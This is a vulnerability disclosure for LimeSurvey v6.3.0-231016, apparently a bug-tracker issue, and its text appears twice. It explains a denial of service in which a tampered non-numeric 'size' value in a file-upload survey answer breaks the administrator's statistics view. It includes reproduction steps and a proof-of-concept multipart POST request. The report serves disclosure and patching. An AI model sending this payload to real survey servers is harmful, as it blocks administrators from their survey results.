LimeSurvey is a widely used open-source online survey system. In version v6.3.0-231016, an input validation vulnerability has been identified, allowing attackers to exploit a vulnerability in surveys containing "file upload" options. This can lead to a denial of service by preventing administrators from accessing statistical results of affected surveys.
Details
The vulnerability is associated with surveys published by administrators that include the "file upload" option. During the survey submission process, users can upload files, and the system validates the size of uploaded files. However, in version v6.3.0-231016, proper input validation is not performed on the uploaded file size, enabling attackers to manipulate submitted data to bypass the expected handling of the system.
Specifically, attackers can manipulate the submitted data and set the "size" parameter to a non-integer value, such as a string. Due to the lack of appropriate input validation, the system fails to handle this non-integer value correctly, resulting in an error. This error renders administrators unable to access statistical results for the affected survey, as the system fails to correctly parse the input data.
Reproduction
Log in to the administrator account.
Create a survey containing the "file upload" option. For Examples: 949614.
During the survey submission process, use manipulated data to set the "size" parameter to a non-integer value. [No permissions are required]
POC
POST /index.php/949614 HTTP/1.1
Host: 192.168.160.130
Content-Length: 1706
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoGwet3umTM5p8M8U
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Open http://192.168.160.130/index.php/responses/browse?surveyId=135964 The administrator is unable to open all statistical data for this questionnaire and prompts: Error code 500: Internal server error round(): Argument #1 ($num) must be of type int|float, string given.
# Impact
Attackers can leverage this vulnerability to execute a denial-of-service attack, obstructing administrators from accessing statistical results of the affected survey. This disruption may lead to interrupted data analysis, impacting the effectiveness and availability of the survey.
# Note
References from https://huntr.com/bounties/6636038f-5cc7-4f87-8a50-922d139d6485
Since the manufacturer did not apply for a CVE number for this vulnerability as required, I will apply for it myself.
Hebing123
commented
1 month ago
Summary
LimeSurvey is a widely used open-source online survey system. In version v6.3.0-231016, an input validation vulnerability has been identified, allowing attackers to exploit a vulnerability in surveys containing "file upload" options. This can lead to a denial of service by preventing administrators from accessing statistical results of affected surveys.
Details
The vulnerability is associated with surveys published by administrators that include the "file upload" option. During the survey submission process, users can upload files, and the system validates the size of uploaded files. However, in version v6.3.0-231016, proper input validation is not performed on the uploaded file size, enabling attackers to manipulate submitted data to bypass the expected handling of the system.
Specifically, attackers can manipulate the submitted data and set the "size" parameter to a non-integer value, such as a string. Due to the lack of appropriate input validation, the system fails to handle this non-integer value correctly, resulting in an error. This error renders administrators unable to access statistical results for the affected survey, as the system fails to correctly parse the input data.
Reproduction
POC
------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="YII_CSRF_TOKEN"
X3VhN0Y2cmIyNVhCMXdFV1BQN0pqVm5iWWw0Q1NpNWKEYOQK5nWbFzgIPM_Ra9R9HWiCLpQjslDBrDKki4XtyQ== ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="fieldnames"
949614X1X1|949614X1X2|949614X1X2_filecount ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="thisstep"
1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="sid"
949614 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="start_time"
1692852765 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="LEMpostKey"
1887323363 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance1"
1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevance2"
1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="relevanceG0"
1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X1"
aeawe ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2"
[{"title":"","comment":"","size":"5.201171875tesat","name":"GAIA-URL.txt","filename":"futmp_drezdtkw4u3rsf8_txt","ext":"txt"}] ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="949614X1X2_filecount"
1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="lastgroup"
949614X1 ------WebKitFormBoundaryoGwet3umTM5p8M8U Content-Disposition: form-data; name="move"
movesubmit ------WebKitFormBoundaryoGwet3umTM5p8M8U--